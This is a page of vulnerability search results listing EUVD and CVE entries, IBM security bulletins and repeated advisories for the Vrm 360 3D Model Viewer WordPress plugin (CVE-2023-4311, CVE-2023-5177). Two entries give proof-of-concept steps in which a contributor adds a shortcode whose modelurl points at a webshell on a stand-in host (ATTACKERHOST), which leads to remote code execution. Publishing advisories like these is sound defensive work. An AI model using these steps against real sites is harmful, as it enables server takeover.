66 matches found
EUVD-2021-10788
Malware in sbrugna...
EUVD-2021-10785
Malware in sbrugna...
EUVD-2021-10786
Malware in sbrugna...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
Security Bulletin: XSS vulnerability affects IBM Cloud Object Storage System (CVE-2021-39014)
Summary XSS vulnerability affects IBM Cloud Object Storage System CVE-2021-39014. This vulnerability has been addressed in the latest ClevOS releases. Vulnerability Details CVEID:CVE-2021-39014 DESCRIPTION: IBM Cloud Object System is vulnerable to stored cross-site scripting. This vulnerability...
Security Bulletin: IBM Storage Insights is vulnerable to weaknesses related to IBM® SDK, Java™ Technology Edition
Summary Vulnerabilities in IBM® SDK, Java™ Technology Edition may affect IBM Storage Insights which could allow a remote attacker to cause low integrity impact, low availability impat. Vulnerability Details CVEID:CVE-2024-21094 DESCRIPTION: An unspecified vulnerability in Java SE related to the V...
Security Bulletin: pdfmake vulnerability affect IBM Spectrum Control
Summary Vulnerability in pdfmake could allow a remote attacker to execute arbitrary code on the system, which could affect IBM Spectrum Control. CVE-2024-25180. Vulnerability Details CVEID:CVE-2024-25180 DESCRIPTION: pdfmake could allow a remote attacker to execute arbitrary code on the system,...
How to Accelerate Vendor Risk Assessments in the Age of SaaS Sprawl
In today's digital-first business environment dominated by SaaS applications, organizations increasingly depend on third-party vendors for essential cloud services and software solutions. As more vendors and services are added to the mix, the complexity and potential vulnerabilities within the Sa...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311 Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...
PT-2023-28700 · WordPress · Vrm 360 3D Model Viewer
Name of the Vulnerable Software and Affected Versions: Vrm 360 3D Model Viewer WordPress plugin versions 1.2.1 and earlier Description: The issue arises from insufficient checks in a plugin shortcode, allowing for arbitrary file upload. Recommendations: For Vrm 360 3D Model Viewer WordPress plugi...
WordPress Plugin Vrm 360 3D Model Viewer Security Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPres...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
Path traversal
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...